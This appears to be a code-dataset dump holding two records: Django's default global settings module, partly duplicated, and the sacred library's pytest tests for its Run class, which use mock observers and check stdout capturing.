'%m/%d/%Y', # '10/25/2006'
'%m/%d/%y %H:%M:%S', # '10/25/06 14:30:59'
'%m/%d/%y %H:%M:%S.%f', # '10/25/06 14:30:59.000200'
'%m/%d/%y %H:%M', # '10/25/06 14:30'
'%m/%d/%y', # '10/25/06'
]
# First day of week, to be used on calendars
# 0 means Sunday, 1 means Monday...
FIRST_DAY_OF_WEEK = 0
# Decimal separator symbol
DECIMAL_SEPARATOR = '.'
# Boolean that sets whether to add thousand separator when formatting numbers
USE_THOUSAND_SEPARATOR = False
# Number of digits that will be together, when splitting them by
# THOUSAND_SEPARATOR. 0 means no grouping, 3 means splitting by thousands...
NUMBER_GROUPING = 0
# Thousand separator symbol
THOUSAND_SEPARATOR = ','
# The tablespaces to use for each model when not specified otherwise.
DEFAULT_TABLESPACE = ''
DEFAULT_INDEX_TABLESPACE = ''
# Default X-Frame-Options header value
X_FRAME_OPTIONS = 'SAMEORIGIN'
# Trust the X-Forwarded-Host / X-Forwarded-Port headers (set by a proxy)
# when building the request's host and port.
USE_X_FORWARDED_HOST = False
USE_X_FORWARDED_PORT = False
# The Python dotted path to the WSGI application that Django's internal server
# (runserver) will use. If `None`, the return value of
# 'django.core.wsgi.get_wsgi_application' is used, thus preserving the same
# behavior as previous versions of Django. Otherwise this should point to an
# actual WSGI application object.
WSGI_APPLICATION = None
# If your Django app is behind a proxy that sets a header to specify secure
# connections, AND that proxy ensures that user-submitted headers with the
# same name are ignored (so that people can't spoof it), set this value to
# a tuple of (header_name, header_value). For any requests that come in with
# that header/value, request.is_secure() will return True.
# WARNING! Only set this if you fully understand what you're doing. Otherwise,
# you may be opening yourself up to a security risk.
SECURE_PROXY_SSL_HEADER = None
##############
# MIDDLEWARE #
##############
# List of middleware to use. Order is important; in the request phase, these
# middleware will be applied in the order given, and in the response
# phase the middleware will be applied in reverse order.
MIDDLEWARE_CLASSES = [
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
]
MIDDLEWARE = None
############
# SESSIONS #
############
# Cache to store session data if using the cache session backend.
SESSION_CACHE_ALIAS = 'default'
# Cookie name. This can be whatever you want.
SESSION_COOKIE_NAME = 'sessionid'
# Age of cookie, in seconds (default: 2 weeks).
SESSION_COOKIE_AGE = 60 * 60 * 24 * 7 * 2
# A string like ".example.com", or None for standard domain cookie.
SESSION_COOKIE_DOMAIN = None
# Whether the session cookie should be secure (https:// only).
SESSION_COOKIE_SECURE = False
# The path of the session cookie.
SESSION_COOKIE_PATH = '/'
# Whether to use the non-RFC standard httpOnly flag (IE, FF3+, others)
SESSION_COOKIE_HTTPONLY = True
# Whether to save the session data on every request.
SESSION_SAVE_EVERY_REQUEST = False
# Whether a user's session cookie expires when the Web browser is closed.
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
# The module to store session data
SESSION_ENGINE = 'django.contrib.sessions.backends.db'
# Directory to store session files if using the file session module. If None,
# the backend will use a sensible default.
SESSION_FILE_PATH = None
# class to serialize session data
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
#########
# CACHE #
#########
# The cache backends to use.
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
# Key prefix, default page timeout (seconds), and cache alias used by the
# cache middleware.
CACHE_MIDDLEWARE_KEY_PREFIX = ''
CACHE_MIDDLEWARE_SECONDS = 600
CACHE_MIDDLEWARE_ALIAS = 'default'
##################
# AUTHENTICATION #
##################
# Model used to represent users, as "app_label.ModelName".
AUTH_USER_MODEL = 'auth.User'
# Backends tried in order when authenticating credentials.
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
# URLs for redirecting unauthenticated users, post-login, and post-logout.
LOGIN_URL = '/accounts/login/'
LOGIN_REDIRECT_URL = '/accounts/profile/'
LOGOUT_REDIRECT_URL = None
# The number of days a password reset link is valid for
PASSWORD_RESET_TIMEOUT_DAYS = 3
# the first hasher in this list is the preferred algorithm. any
# password using different algorithms will be converted automatically
# upon login
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
AUTH_PASSWORD_VALIDATORS = []
###########
# SIGNING #
###########
SIGNING_BACKEND = 'django.core.signing.TimestampSigner'
########
# CSRF #
########
# Dotted path to callable to be used as view when a request is
# rejected by the CSRF middleware.
CSRF_FAILURE_VIEW = 'django.views.csrf.csrf_failure'
# Settings for CSRF cookie.
CSRF_COOKIE_NAME = 'csrftoken'
CSRF_COOKIE_AGE = 60 * 60 * 24 * 7 * 52
CSRF_COOKIE_DOMAIN = None
CSRF_COOKIE_PATH = '/'
CSRF_COOKIE_SECURE = False
CSRF_COOKIE_HTTPONLY = False
CSRF_HEADER_NAME = 'HTTP_X_CSRFTOKEN'
CSRF_TRUSTED_ORIGINS = []
CSRF_USE_SESSIONS = False
############
# MESSAGES #
############
# Class to use as messages backend
MESSAGE_STORAGE = 'django.contrib.messages.storage.fallback.FallbackStorage'
# Default values of MESSAGE_LEVEL and MESSAGE_TAGS are defined within
# django.contrib.messages to avoid imports in this settings file.
###########
# LOGGING #
###########
# The callable to use to configure logging
LOGGING_CONFIG = 'logging.config.dictConfig'
# Custom logging configuration.
LOGGING = {}
# Default exception reporter filter class used in case none has been
# specifically assigned to the HttpRequest instance.
DEFAULT_EXCEPTION_REPORTER_FILTER = 'django.views.debug.SafeExceptionReporterFilter'
###########
# TESTING #
###########
# The name of the class to use to run the test suite
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Apps that don't need to be serialized at test database creation time
# (only apps with migrations are to start with)
TEST_NON_SERIALIZED_APPS = []
############
# FIXTURES #
############
# The list of directories to search for fixtures
FIXTURE_DIRS = []
###############
# STATICFILES #
###############
# A list of locations of additional static files
STATICFILES_DIRS = []
# The default file storage backend used during the build process
STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
]
##############
# MIGRATIONS #
##############
# Migration module overrides for apps, by app label.
MIGRATION_MODULES = {}
#################
# SYSTEM CHECKS #
#################
# List of all issues generated by system checks that should be silenced. Light
# issues like warnings, infos or debugs will not generate a message. Silencing
# serious issues like errors and criticals does not result in hiding the
# message, but Django will not stop you from e.g. running server.
SILENCED_SYSTEM_CHECKS = []
#######################
# SECURITY MIDDLEWARE #
#######################
# Defaults consumed by django.middleware.security.SecurityMiddleware:
# X-XSS-Protection and X-Content-Type-Options headers, HSTS policy,
# and HTTPS redirect behavior.
SECURE_BROWSER_XSS_FILTER = False
SECURE_CONTENT_TYPE_NOSNIFF = False
SECURE_HSTS_INCLUDE_SUBDOMAINS = False
SECURE_HSTS_PRELOAD = False
SECURE_HSTS_SECONDS = 0
SECURE_REDIRECT_EXEMPT = []
SECURE_SSL_HOST = None
SECURE_SSL_REDIRECT = False
| 34.454969 | 103 | 0.703006 |
from __future__ import unicode_literals
# django.utils.translation -- that module depends on the settings.
def gettext_noop(s):
    """Identity passthrough marking *s* for translation without importing
    django.utils.translation (which depends on settings)."""
    return s
####################
# CORE #
####################
DEBUG = False
# Whether the framework should propagate raw exceptions rather than catching
# them. This is useful under some testing situations and should never be used
# on a live site.
DEBUG_PROPAGATE_EXCEPTIONS = False
# Whether to use the "ETag" header. This saves bandwidth but slows down performance.
# Deprecated (RemovedInDjango21Warning) in favor of ConditionalGetMiddleware
# which sets the ETag regardless of this setting.
USE_ETAGS = False
# People who get code error notifications.
# In the format [('Full Name', 'email@example.com'), ('Full Name', 'anotheremail@example.com')]
ADMINS = []
# List of IP addresses, as strings, that:
# * See debug comments, when DEBUG is true
# * Receive x-headers
INTERNAL_IPS = []
# Hosts/domain names that are valid for this site.
# "*" matches anything, ".example.com" matches example.com and all subdomains
ALLOWED_HOSTS = []
# Local time zone for this installation. All choices can be found here:
# https://en.wikipedia.org/wiki/List_of_tz_zones_by_name (although not all
# systems may support all possibilities). When USE_TZ is True, this is
# interpreted as the default user time zone.
TIME_ZONE = 'America/Chicago'
# If you set this to True, Django will use timezone-aware datetimes.
USE_TZ = False
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Languages we provide translations for, out of the box.
LANGUAGES = [
('af', gettext_noop('Afrikaans')),
('ar', gettext_noop('Arabic')),
('ast', gettext_noop('Asturian')),
('az', gettext_noop('Azerbaijani')),
('bg', gettext_noop('Bulgarian')),
('be', gettext_noop('Belarusian')),
('bn', gettext_noop('Bengali')),
('br', gettext_noop('Breton')),
('bs', gettext_noop('Bosnian')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('cy', gettext_noop('Welsh')),
('da', gettext_noop('Danish')),
('de', gettext_noop('German')),
('dsb', gettext_noop('Lower Sorbian')),
('el', gettext_noop('Greek')),
('en', gettext_noop('English')),
('en-au', gettext_noop('Australian English')),
('en-gb', gettext_noop('British English')),
('eo', gettext_noop('Esperanto')),
('es', gettext_noop('Spanish')),
('es-ar', gettext_noop('Argentinian Spanish')),
('es-co', gettext_noop('Colombian Spanish')),
('es-mx', gettext_noop('Mexican Spanish')),
('es-ni', gettext_noop('Nicaraguan Spanish')),
('es-ve', gettext_noop('Venezuelan Spanish')),
('et', gettext_noop('Estonian')),
('eu', gettext_noop('Basque')),
('fa', gettext_noop('Persian')),
('fi', gettext_noop('Finnish')),
('fr', gettext_noop('French')),
('fy', gettext_noop('Frisian')),
('ga', gettext_noop('Irish')),
('gd', gettext_noop('Scottish Gaelic')),
('gl', gettext_noop('Galician')),
('he', gettext_noop('Hebrew')),
('hi', gettext_noop('Hindi')),
('hr', gettext_noop('Croatian')),
('hsb', gettext_noop('Upper Sorbian')),
('hu', gettext_noop('Hungarian')),
('ia', gettext_noop('Interlingua')),
('id', gettext_noop('Indonesian')),
('io', gettext_noop('Ido')),
('is', gettext_noop('Icelandic')),
('it', gettext_noop('Italian')),
('ja', gettext_noop('Japanese')),
('ka', gettext_noop('Georgian')),
('kk', gettext_noop('Kazakh')),
('km', gettext_noop('Khmer')),
('kn', gettext_noop('Kannada')),
('ko', gettext_noop('Korean')),
('lb', gettext_noop('Luxembourgish')),
('lt', gettext_noop('Lithuanian')),
('lv', gettext_noop('Latvian')),
('mk', gettext_noop('Macedonian')),
('ml', gettext_noop('Malayalam')),
('mn', gettext_noop('Mongolian')),
('mr', gettext_noop('Marathi')),
('my', gettext_noop('Burmese')),
('nb', gettext_noop('Norwegian Bokmål')),
('ne', gettext_noop('Nepali')),
('nl', gettext_noop('Dutch')),
('nn', gettext_noop('Norwegian Nynorsk')),
('os', gettext_noop('Ossetic')),
('pa', gettext_noop('Punjabi')),
('pl', gettext_noop('Polish')),
('pt', gettext_noop('Portuguese')),
('pt-br', gettext_noop('Brazilian Portuguese')),
('ro', gettext_noop('Romanian')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('sl', gettext_noop('Slovenian')),
('sq', gettext_noop('Albanian')),
('sr', gettext_noop('Serbian')),
('sr-latn', gettext_noop('Serbian Latin')),
('sv', gettext_noop('Swedish')),
('sw', gettext_noop('Swahili')),
('ta', gettext_noop('Tamil')),
('te', gettext_noop('Telugu')),
('th', gettext_noop('Thai')),
('tr', gettext_noop('Turkish')),
('tt', gettext_noop('Tatar')),
('udm', gettext_noop('Udmurt')),
('uk', gettext_noop('Ukrainian')),
('ur', gettext_noop('Urdu')),
('vi', gettext_noop('Vietnamese')),
('zh-hans', gettext_noop('Simplified Chinese')),
('zh-hant', gettext_noop('Traditional Chinese')),
]
# Languages using BiDi (right-to-left) layout
LANGUAGES_BIDI = ["he", "ar", "fa", "ur"]
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
LOCALE_PATHS = []
# Settings for language cookie
LANGUAGE_COOKIE_NAME = 'django_language'
LANGUAGE_COOKIE_AGE = None
LANGUAGE_COOKIE_DOMAIN = None
LANGUAGE_COOKIE_PATH = '/'
# If you set this to True, Django will format dates, numbers and calendars
# according to user current locale.
USE_L10N = False
# Not-necessarily-technical managers of the site. They get broken link
# notifications and other various emails.
MANAGERS = ADMINS
# Default content type and charset to use for all HttpResponse objects, if a
# MIME type isn't manually specified. These are used to construct the
DEFAULT_CONTENT_TYPE = 'text/html'
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_EMAIL = 'root@localhost'
DATABASES = {}
DATABASE_ROUTERS = []
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'localhost'
EMAIL_PORT = 25
EMAIL_USE_LOCALTIME = False
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = False
EMAIL_USE_SSL = False
EMAIL_SSL_CERTFILE = None
EMAIL_SSL_KEYFILE = None
EMAIL_TIMEOUT = None
INSTALLED_APPS = []
TEMPLATES = []
FORM_RENDERER = 'django.forms.renderers.DjangoTemplates'
DEFAULT_FROM_EMAIL = 'webmaster@localhost'
EMAIL_SUBJECT_PREFIX = '[Django] '
APPEND_SLASH = True
PREPEND_WWW = False
# Override the server-derived value of SCRIPT_NAME
FORCE_SCRIPT_NAME = None
# List of compiled regular expression objects representing User-Agent strings
# that are not allowed to visit any page, systemwide. Use this for bad
# robots/crawlers. Here are a few examples:
# import re
# DISALLOWED_USER_AGENTS = [
# re.compile(r'^NaverBot.*'),
# re.compile(r'^EmailSiphon.*'),
# re.compile(r'^SiteSucker.*'),
# re.compile(r'^sohu-search')
# ]
DISALLOWED_USER_AGENTS = []
ABSOLUTE_URL_OVERRIDES = {}
# List of compiled regular expression objects representing URLs that need not
# be reported by BrokenLinkEmailsMiddleware. Here are a few examples:
# import re
# IGNORABLE_404_URLS = [
#     re.compile(r'^/apple-touch-icon.*\.png$'),
#     re.compile(r'^/favicon\.ico$'),
#     re.compile(r'^/phpmyadmin/'),
# ]
IGNORABLE_404_URLS = []
SECRET_KEY = ''
DEFAULT_FILE_STORAGE = 'django.core.files.storage.FileSystemStorage'
MEDIA_ROOT = ''
MEDIA_URL = ''
STATIC_ROOT = None
STATIC_URL = None
FILE_UPLOAD_HANDLERS = [
'django.core.files.uploadhandler.MemoryFileUploadHandler',
'django.core.files.uploadhandler.TemporaryFileUploadHandler',
]
FILE_UPLOAD_MAX_MEMORY_SIZE = 2621440
DATA_UPLOAD_MAX_MEMORY_SIZE = 2621440
DATA_UPLOAD_MAX_NUMBER_FIELDS = 1000
# Directory in which upload streamed files will be temporarily saved. A value
# of `None` will make Django use the operating system's default temporary
# directory (i.e. "/tmp" on *nix systems).
FILE_UPLOAD_TEMP_DIR = None
# The numeric mode to set newly-uploaded files to. The value should be a mode
# you'd pass directly to os.chmod; see https://docs.python.org/3/library/os.html
FILE_UPLOAD_PERMISSIONS = None
# see https://docs.python.org/3/library/os.html#files-and-directories.
FILE_UPLOAD_DIRECTORY_PERMISSIONS = None
# Python module path where user will place custom format definition.
# The directory where this setting is pointing should contain subdirectories
# named as the locales, containing a formats.py file
# (i.e. "myproject.locale" for myproject/locale/en/formats.py etc. use)
FORMAT_MODULE_PATH = None
# Default formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'N j, Y'
# Default formatting for datetime objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATETIME_FORMAT = 'N j, Y, P'
# Default formatting for time objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
TIME_FORMAT = 'P'
# Default formatting for date objects when only the year and month are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
YEAR_MONTH_FORMAT = 'F Y'
# Default formatting for date objects when only the month and day are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
MONTH_DAY_FORMAT = 'F j'
# Default short formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATE_FORMAT = 'm/d/Y'
# Default short formatting for datetime objects.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATETIME_FORMAT = 'm/d/Y P'
# Default formats to be used when parsing dates from input boxes, in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATE_INPUT_FORMATS = [
'%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', # '2006-10-25', '10/25/2006', '10/25/06'
'%b %d %Y', '%b %d, %Y', # 'Oct 25 2006', 'Oct 25, 2006'
'%d %b %Y', '%d %b, %Y', # '25 Oct 2006', '25 Oct, 2006'
'%B %d %Y', '%B %d, %Y', # 'October 25 2006', 'October 25, 2006'
'%d %B %Y', '%d %B, %Y', # '25 October 2006', '25 October, 2006'
]
# Default formats to be used when parsing times from input boxes, in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
TIME_INPUT_FORMATS = [
'%H:%M:%S', # '14:30:59'
'%H:%M:%S.%f', # '14:30:59.000200'
'%H:%M', # '14:30'
]
# Default formats to be used when parsing dates and times from input boxes,
# in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATETIME_INPUT_FORMATS = [
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%m/%d/%Y %H:%M:%S', # '10/25/2006 14:30:59'
'%m/%d/%Y %H:%M:%S.%f', # '10/25/2006 14:30:59.000200'
'%m/%d/%Y %H:%M', # '10/25/2006 14:30'
'%m/%d/%Y', # '10/25/2006'
'%m/%d/%y %H:%M:%S', # '10/25/06 14:30:59'
'%m/%d/%y %H:%M:%S.%f', # '10/25/06 14:30:59.000200'
'%m/%d/%y %H:%M', # '10/25/06 14:30'
'%m/%d/%y', # '10/25/06'
]
# First day of week, to be used on calendars
# 0 means Sunday, 1 means Monday...
FIRST_DAY_OF_WEEK = 0
# Decimal separator symbol
DECIMAL_SEPARATOR = '.'
# Boolean that sets whether to add thousand separator when formatting numbers
USE_THOUSAND_SEPARATOR = False
# Number of digits that will be together, when splitting them by
# THOUSAND_SEPARATOR. 0 means no grouping, 3 means splitting by thousands...
NUMBER_GROUPING = 0
# Thousand separator symbol
THOUSAND_SEPARATOR = ','
# The tablespaces to use for each model when not specified otherwise.
DEFAULT_TABLESPACE = ''
DEFAULT_INDEX_TABLESPACE = ''
# Default X-Frame-Options header value
X_FRAME_OPTIONS = 'SAMEORIGIN'
USE_X_FORWARDED_HOST = False
USE_X_FORWARDED_PORT = False
# The Python dotted path to the WSGI application that Django's internal server
# (runserver) will use. If `None`, the return value of
# 'django.core.wsgi.get_wsgi_application' is used.
WSGI_APPLICATION = None
# If your Django app is behind a proxy that sets a header to specify secure
# connections, AND that proxy ensures that user-submitted headers with the
# same name are ignored (so that people can't spoof it), set this value to
# a tuple of (header_name, header_value). For any requests that come in with
# that header/value, request.is_secure() will return True.
# WARNING! Only set this if you fully understand what you're doing. Otherwise,
# you may be opening yourself up to a security risk.
SECURE_PROXY_SSL_HEADER = None
# Settings for session cookies. The line "E = False" was a truncation
# artifact of "SESSION_COOKIE_SECURE = False" (the Django default: session
# cookies are not restricted to HTTPS unless explicitly enabled).
SESSION_COOKIE_SECURE = False
SESSION_COOKIE_PATH = '/'
SESSION_COOKIE_HTTPONLY = True
SESSION_SAVE_EVERY_REQUEST = False
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
# The module to store session data
SESSION_ENGINE = 'django.contrib.sessions.backends.db'
# Directory to store session files if using the file session module. If None,
# the backend will use a sensible default.
SESSION_FILE_PATH = None
# class to serialize session data
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
#########
# CACHE #
#########
# The cache backends to use.
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
CACHE_MIDDLEWARE_KEY_PREFIX = ''
CACHE_MIDDLEWARE_SECONDS = 600
CACHE_MIDDLEWARE_ALIAS = 'default'
##################
# AUTHENTICATION #
##################
AUTH_USER_MODEL = 'auth.User'
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
LOGIN_URL = '/accounts/login/'
LOGIN_REDIRECT_URL = '/accounts/profile/'
LOGOUT_REDIRECT_URL = None
# The number of days a password reset link is valid for
PASSWORD_RESET_TIMEOUT_DAYS = 3
# the first hasher in this list is the preferred algorithm. any
# password using different algorithms will be converted automatically
# upon login
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
AUTH_PASSWORD_VALIDATORS = []
###########
# SIGNING #
###########
SIGNING_BACKEND = 'django.core.signing.TimestampSigner'
########
# CSRF #
########
# Dotted path to callable to be used as view when a request is
# rejected by the CSRF middleware.
CSRF_FAILURE_VIEW = 'django.views.csrf.csrf_failure'
# Settings for CSRF cookie.
CSRF_COOKIE_NAME = 'csrftoken'
CSRF_COOKIE_AGE = 60 * 60 * 24 * 7 * 52
CSRF_COOKIE_DOMAIN = None
CSRF_COOKIE_PATH = '/'
CSRF_COOKIE_SECURE = False
CSRF_COOKIE_HTTPONLY = False
CSRF_HEADER_NAME = 'HTTP_X_CSRFTOKEN'
CSRF_TRUSTED_ORIGINS = []
CSRF_USE_SESSIONS = False
############
# MESSAGES #
############
# Class to use as messages backend
MESSAGE_STORAGE = 'django.contrib.messages.storage.fallback.FallbackStorage'
# Default values of MESSAGE_LEVEL and MESSAGE_TAGS are defined within
# django.contrib.messages to avoid imports in this settings file.
###########
# LOGGING #
###########
# The callable to use to configure logging
LOGGING_CONFIG = 'logging.config.dictConfig'
# Custom logging configuration.
LOGGING = {}
# Default exception reporter filter class used in case none has been
# specifically assigned to the HttpRequest instance.
DEFAULT_EXCEPTION_REPORTER_FILTER = 'django.views.debug.SafeExceptionReporterFilter'
###########
# TESTING #
###########
# The name of the class to use to run the test suite
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Apps that don't need to be serialized at test database creation time
TEST_NON_SERIALIZED_APPS = []
| true | true |
f732689a19695848c73536abbc88f78ed5fd6d88 | 8,182 | py | Python | tests/test_run.py | martinxyz/sacred | fa452e4eacf29caa59fb46c274a519669d6b4790 | [
"MIT"
] | 2 | 2016-10-24T10:26:03.000Z | 2016-10-31T15:22:13.000Z | tests/test_run.py | martinxyz/sacred | fa452e4eacf29caa59fb46c274a519669d6b4790 | [
"MIT"
] | 5 | 2016-10-22T15:46:11.000Z | 2017-06-29T11:19:11.000Z | tests/test_run.py | martinxyz/sacred | fa452e4eacf29caa59fb46c274a519669d6b4790 | [
"MIT"
] | 1 | 2020-04-11T14:44:42.000Z | 2020-04-11T14:44:42.000Z | #!/usr/bin/env python
# coding=utf-8
from __future__ import division, print_function, unicode_literals
from datetime import datetime
import mock
import os
import pytest
import tempfile
import sys
from sacred.run import Run
from sacred.config.config_summary import ConfigSummary
from sacred.utils import (ObserverError, SacredInterrupt, TimeoutInterrupt,
apply_backspaces_and_linefeeds)
@pytest.fixture
def run():
    """A Run built entirely from mocks: a fixed config, a stub main function
    that returns 123, one mock observer (priority 10), and mock loggers."""
    config = {'a': 17, 'foo': {'bar': True, 'baz': False}, 'seed': 1234}
    config_mod = ConfigSummary()
    signature = mock.Mock()
    # signature.name becomes the reported command name (see
    # test_run_started_event, which expects command='main_func').
    signature.name = 'main_func'
    main_func = mock.Mock(return_value=123, prefix='', signature=signature)
    logger = mock.Mock()
    observer = [mock.Mock(priority=10)]
    # The two {} args feed experiment_info and host_info; the trailing empty
    # lists are presumably pre-/post-run hooks — confirm against Run.__init__.
    return Run(config, config_mod, main_func, observer, logger, logger, {},
               {}, [], [])
def test_run_attributes(run):
    """A fresh Run exposes its mapping attributes with the expected types."""
    expected_types = [
        ('config', dict),
        ('config_modifications', ConfigSummary),
        ('experiment_info', dict),
        ('host_info', dict),
        ('info', dict),
    ]
    for attr_name, attr_type in expected_types:
        assert isinstance(getattr(run, attr_name), attr_type)
def test_run_state_attributes(run):
    """Before execution a Run has no timestamps, no output, and no result."""
    assert run.start_time is None and run.stop_time is None
    assert run.captured_out == ''
    assert run.result is None
def test_run_run(run):
    """Executing the Run returns and stores the mocked result and stamps
    start/stop times close to "now"."""
    assert run() == 123
    for stamp in (run.start_time, run.stop_time):
        assert (stamp - datetime.utcnow()).total_seconds() < 1
    assert run.result == 123
    assert run.captured_out == ''
def test_run_emits_events_if_successful(run):
run()
observer = run.observers[0]
assert observer.started_event.called
assert observer.heartbeat_event.called
assert observer.completed_event.called
assert not observer.interrupted_event.called
assert not observer.failed_event.called
@pytest.mark.parametrize('exception,status', [
(KeyboardInterrupt, 'INTERRUPTED'),
(SacredInterrupt, 'INTERRUPTED'),
(TimeoutInterrupt, 'TIMEOUT'),
])
def test_run_emits_events_if_interrupted(run, exception, status):
observer = run.observers[0]
run.main_function.side_effect = exception
with pytest.raises(exception):
run()
assert observer.started_event.called
assert observer.heartbeat_event.called
assert not observer.completed_event.called
assert observer.interrupted_event.called
observer.interrupted_event.assert_called_with(
interrupt_time=run.stop_time,
status=status)
assert not observer.failed_event.called
def test_run_emits_events_if_failed(run):
observer = run.observers[0]
run.main_function.side_effect = TypeError
with pytest.raises(TypeError):
run()
assert observer.started_event.called
assert observer.heartbeat_event.called
assert not observer.completed_event.called
assert not observer.interrupted_event.called
assert observer.failed_event.called
def test_run_started_event(run):
observer = run.observers[0]
run()
observer.started_event.assert_called_with(
command='main_func',
ex_info=run.experiment_info,
host_info=run.host_info,
start_time=run.start_time,
config=run.config,
meta_info={},
_id=None
)
def test_run_completed_event(run):
observer = run.observers[0]
run()
observer.completed_event.assert_called_with(
stop_time=run.stop_time,
result=run.result
)
def test_run_heartbeat_event(run):
observer = run.observers[0]
run.info['test'] = 321
run()
call_args, call_kwargs = observer.heartbeat_event.call_args_list[0]
assert call_kwargs['info'] == run.info
assert call_kwargs['captured_out'] == ""
assert (call_kwargs['beat_time'] - datetime.utcnow()).total_seconds() < 1
def test_run_artifact_event(run):
observer = run.observers[0]
handle, f_name = tempfile.mkstemp()
metadata = {'testkey': 42}
run.add_artifact(f_name, name='foobar', metadata=metadata)
observer.artifact_event.assert_called_with(filename=f_name, name='foobar', metadata=metadata)
os.close(handle)
os.remove(f_name)
def test_run_resource_event(run):
observer = run.observers[0]
handle, f_name = tempfile.mkstemp()
run.open_resource(f_name)
observer.resource_event.assert_called_with(filename=f_name)
os.close(handle)
os.remove(f_name)
def test_run_cannot_be_started_twice(run):
    # A Run is single-use: invoking it a second time must raise RuntimeError.
    run()
    with pytest.raises(RuntimeError):
        run()
def test_run_observer_failure_on_startup_not_caught(run):
observer = run.observers[0]
observer.started_event.side_effect = ObserverError
with pytest.raises(ObserverError):
run()
def test_run_observer_error_in_heartbeat_is_caught(run):
observer = run.observers[0]
observer.heartbeat_event.side_effect = TypeError
run()
assert observer in run._failed_observers
assert observer.started_event.called
assert observer.heartbeat_event.called
assert observer.completed_event.called
def test_run_exception_in_completed_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.completed_event.side_effect = TypeError
run()
assert observer.completed_event.called
assert observer2.completed_event.called
def test_run_exception_in_interrupted_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.interrupted_event.side_effect = TypeError
run.main_function.side_effect = KeyboardInterrupt
with pytest.raises(KeyboardInterrupt):
run()
assert observer.interrupted_event.called
assert observer2.interrupted_event.called
def test_run_exception_in_failed_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.failed_event.side_effect = TypeError
run.main_function.side_effect = AttributeError
with pytest.raises(AttributeError):
run()
assert observer.failed_event.called
assert observer2.failed_event.called
def test_unobserved_run_doesnt_emit(run):
observer = run.observers[0]
run.unobserved = True
run()
assert not observer.started_event.called
assert not observer.heartbeat_event.called
assert not observer.completed_event.called
assert not observer.interrupted_event.called
assert not observer.failed_event.called
def test_stdout_capturing_no(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
run.capture_mode = "no"
with capsys.disabled():
run()
assert run.captured_out == ''
def test_stdout_capturing_sys(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
run.capture_mode = "sys"
with capsys.disabled():
run()
assert run.captured_out == '0123456789'
@pytest.mark.skip('Breaks randomly on test server')
def test_stdout_capturing_fd(run, capsys):
    """capture_mode='fd' captures output written to the stdout file descriptor.

    Skipped: flaky on CI, and historically did not work on Windows (the
    previously commented-out skipif guarded against that).
    """
    def print_mock_progress():
        for i in range(10):
            print(i, end="")
            sys.stdout.flush()

    run.main_function.side_effect = print_mock_progress
    run.capture_mode = "fd"
